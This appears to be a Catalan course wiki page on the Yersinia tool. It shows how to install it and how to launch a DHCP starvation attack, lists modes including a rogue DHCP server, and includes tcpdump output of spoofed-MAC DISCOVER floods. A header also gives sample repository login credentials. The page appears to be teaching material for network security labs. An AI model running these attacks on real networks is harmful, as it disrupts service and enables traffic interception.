IMPORTANT: Per accedir als fitxer de subversion: http://acacha.org/svn (sense password). Poc a poc s'aniran migrant els enllaços. Encara però funciona el subversion de la farga però no se sap fins quan... (usuari: prova i la paraula de pas 123456)

Instal·lació

$ sudo apt-get install yersinia

Atacs DHCP

$ yersinia dhcp -i eth0 -attack 1

El primer paràmetre queda clar, el protocol a atacar, en aquest cas dhcp. El segon paramente -i eth0 és la interfície per on llançar l’atac.

Finalment el tercer paràmetre marca el tipus d’atac, en aquest cas és 1, i les seves opcions son:

0: Paquets RAW
1: Paquets DISCOVER
2: Crear un servidor DHCP fals
3: Paquets RELEASE

Comproveu l'atac amb:

$ sudo tcpdump -i eth0 port 67 or port 68 -e -n 
21:44:52.965288 4d:67:bb:21:6c:63 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 >  255.255.255.255.67: BOOTP/DHCP, Request from 4d:67:bb:21:6c:63, length 244
21:44:52.965311 81:5e:db:0e:ea:92 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 81:5e:db:0e:ea:92, length 244
21:44:52.965336 be:6b:e5:1a:ad:bc > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from be:6b:e5:1a:ad:bc, length 244
21:44:52.965370 3c:59:2a:06:00:c7 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 3c:59:2a:06:00:c7, length 244
21:44:52.965394 15:85:d6:13:bd:d5 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 15:85:d6:13:bd:d5, length 244
21:44:52.965417 24:11:45:51:e6:4c > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 24:11:45:51:e6:4c, length 244
21:44:52.965473 70:19:eb:2c:ca:9d > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 70:19:eb:2c:ca:9d, length 244
21:44:52.965497 ef:1d:68:1a:24:15 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from ef:1d:68:1a:24:15, length 244
21:44:52.965521 5f:47:d8:0b:1d:4f > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 5f:47:d8:0b:1d:4f, length 244
21:44:52.965545 13:04:68:3f:0a:2f > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 13:04:68:3f:0a:2f, length 244
21:44:52.965568 2f:b3:32:23:1e:df > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 2f:b3:32:23:1e:df, length 244
21:44:52.965592 d6:09:87:67:b3:cc > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from d6:09:87:67:b3:cc, length 244
21:44:52.965615 79:24:c1:66:75:78 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 79:24:c1:66:75:78, length 244
21:44:52.965648 bf:fa:a9:5d:24:76 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from bf:fa:a9:5d:24:76, length 244

Vegeu també

Enllaços externs